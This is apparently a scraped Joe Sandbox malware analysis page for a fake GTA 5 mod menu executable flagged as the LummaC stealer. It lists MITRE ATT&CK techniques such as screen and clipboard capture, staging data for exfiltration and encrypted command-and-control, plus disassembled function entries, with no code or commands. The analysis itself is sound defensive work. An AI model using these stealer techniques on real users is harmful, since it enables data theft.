Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GTA-5-Mod-Menu-2025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
GTA-5-Mod-Menu-2025.exe

Function 00FB019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00F81C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 00F96602 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00F96DEA Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 00F81DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 00F8F253 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00F9D364 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00F97268 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00F9DB3D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00F97152 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00F82010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 00F964B3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 00F95677 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 00F814C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Function 00F977F7 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre